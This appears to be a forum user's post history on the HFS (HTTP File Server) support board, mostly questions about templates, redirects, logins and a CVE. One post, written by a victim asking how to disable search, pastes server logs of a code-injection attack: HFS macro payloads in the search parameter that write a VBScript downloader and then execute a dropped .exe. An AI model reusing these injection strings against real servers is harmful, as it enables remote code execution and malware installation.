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Pages: 1
I am using a script for displaying folder previews
Code: [Select]
{. if|{. exists|%item-folder%{.decodeuri|%item-url%.}.jpg .}| <img src="%item-url%.jpg" /> |  .}It doesn't work for some folders using cyrillic names. What can I do about it?

Bug reports / A question about HFS v2.3m vulnerability
« on: July 25, 2023, 05:00:40 AM »

rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
If I read it correctly, this is a DoS solution that can't deal real damage, such as remote code execution?

Which HFS version is more secure (2.3m / 2.4 / 3.0)? Logically, not the beta versions, but they may have some vulnernabilities patched, I guess.

HFS ~ HTTP File Server / How can I set up a simple redirect?
« on: March 23, 2022, 10:36:58 AM »
should be redirected to
and same with all files in /123/

is this possible?

HFS ~ HTTP File Server / Request login/password but accept any
« on: December 17, 2021, 12:11:13 PM »
Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

Bug reports / Possible vulnerability
« on: December 11, 2021, 04:34:32 AM »
Since yesterday, someone is trying to pull code injection on me  :(  I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway
Code: [Select]
10.12.2021 6:55:41 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 57608 Requested GET /
10.12.2021 7:01:28 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "", False
> xHttp.Send
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
10.12.2021 6:55:36 52884 Requested GET /
10.12.2021 6:55:37 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "", False
> xHttp.Send
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
11.12.2021 8:08:23 55846 Requested GET /
11.12.2021 8:08:24 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "", False
> xHttp.Send
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}

Bug reports / False errors on upload
« on: September 16, 2021, 10:54:00 PM »
They only appear in logs. I'm using HFS 2.3m

Code: [Select]
Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

HTML & templates / Custom folder previews
« on: September 11, 2021, 09:36:48 PM »
Let's say I have following folders

New folder
New folder 2
New folder 3

Each contains a "p.jpg", I want to use these as folder preview.

The code for diff template I'm currently using:
Code: [Select]
var list=document.querySelectorAll("table#files>tbody>tr");
function changepic(a1)
  var alink=a1.querySelector("a");
  var adress=alink.getAttribute("href");
  var img=document.createElement("img");
eats too much cpu if there are too many folders. Because script doesn't check if p.jpg is actually present in folder

How can I fix it? Thanks in advance.

HFS ~ HTTP File Server / Is there a way to add login message?
« on: May 28, 2021, 02:14:30 AM »
Like in attachment.

HTML & templates / How can I implement thing on image attached?
« on: March 15, 2021, 02:28:24 AM »
I need folder names to have additional link attached automatically, with part of foldername in it:

Folder "A - B C 3" [link to]
Folder "A - B C 3" [link to B C III]

1. How can I use foldername as variable?
2. How can I edit that variable? (%20- = %3A)
3. How can I add my link through diff template?

HFS ~ HTTP File Server / Is there a way to add multiple rows in banlist?
« on: February 25, 2021, 05:52:28 PM »

Pages: 1